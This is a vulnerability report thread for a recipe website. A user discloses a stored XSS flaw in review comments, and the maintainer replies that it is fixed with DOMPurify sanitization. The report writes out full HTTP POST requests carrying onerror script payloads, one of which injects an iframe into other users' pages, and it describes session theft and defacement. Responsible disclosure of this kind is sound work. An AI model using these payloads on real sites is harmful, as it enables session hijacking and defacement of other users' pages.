typio
commented
1 year ago @bear102 I fixed this exploit by sanitizing the review comment on the frontend with the DOMPurify library which removes the onerror from the img tag. I didn't intend for images to be enabled in the review, but can see it being kind of cool so I didn't blacklist the tag. The other place with carte blanche HTML rendering was the recipe writer so added the sanitizer there too.
Luckily this isn't a difficult vulnerability, just careless use of Svelte's "@html" which is only used on the recipe page.
I appreciate you discovering it and bringing it to my attention. Your contribution is highly valued. Thank you!
greetings, its bear.
I found a very scary vulnerability.
What can happen if bad guy finds it: ddos xss (leak session id) html defacement any javascript execution on user browser malicious iframe (phishing, clickjacking, more scary stuff) even more scary stuff
The exploit:
By sending this specific http post request
POST /recipe/review HTTP/2 Host: www.recipow.com Cookie: _ga=GA1.1.58669917.1689302410; sessionId=; _ga_VR9MW6WD01=GS1.1.1689302409.1.1.1689302473.0.0.0
Content-Length: 98
Sec-Ch-Ua:
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Origin: https://www.recipow.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.recipow.com/@thomas/recipe-raweggslushie
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"recipe":"@thomas/recipe-raweggslushie","rating":4.9375,"comment":"<img src/onerror=alert(1)>bb"}
There is an xss attack <img src/onerror=alert(1)>bb. This can be used to steal the session id cookie and log in as other users. :(((
This is because the user is allowed to change the input which is directly reflected into the html (very unsafe and scary!!)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Here is an example of executing javascript (also allowing for potentially malicious iframes)
POST /recipe/review HTTP/2 Host: www.recipow.com Cookie: _ga=GA1.1.58669917.1689302410; sessionId=dwadawda33t14; _ga_VR9MW6WD01=GS1.1.1689302409.1.1.1689302473.0.0.0 Content-Length: 597 Sec-Ch-Ua: Sec-Ch-Ua-Platform: "" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://www.recipow.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.recipow.com/@thomas/recipe-raweggslushie Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
{"recipe":"@thomas/recipe-raweggslushie","rating":4.9375,"comment":"<img src/onerror=\"var youtubeIframe = document.createElement('iframe');youtubeIframe.width = '560';youtubeIframe.height = '315';youtubeIframe.src = 'https://www.youtube.com/embed/yMDOin3yWhU';youtubeIframe.title = 'YouTube video player';youtubeIframe.frameBorder = '0';youtubeIframe.allow = 'accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share';youtubeIframe.allowFullscreen = true;document.getElementsByClassName('w-full my-12')[0].appendChild(youtubeIframe);\">clickme"}
This code imbeads an iframe into another user's recipie page that shows a youtube video of bears. Remember this can be used to create a fishing page or show other content or deface the website or do many other things. Many other scary things!!! (cryptomining?)
i think you got the idea by now. You can also use this javascript to force all visitors to create new recipies with hundreds of images and send xss attacks from the victims browsers and it can be very bad. Very scary.
Summary: Exploit allows any user to abuse reflected xss to execute javascript on a victim browser. (very scary)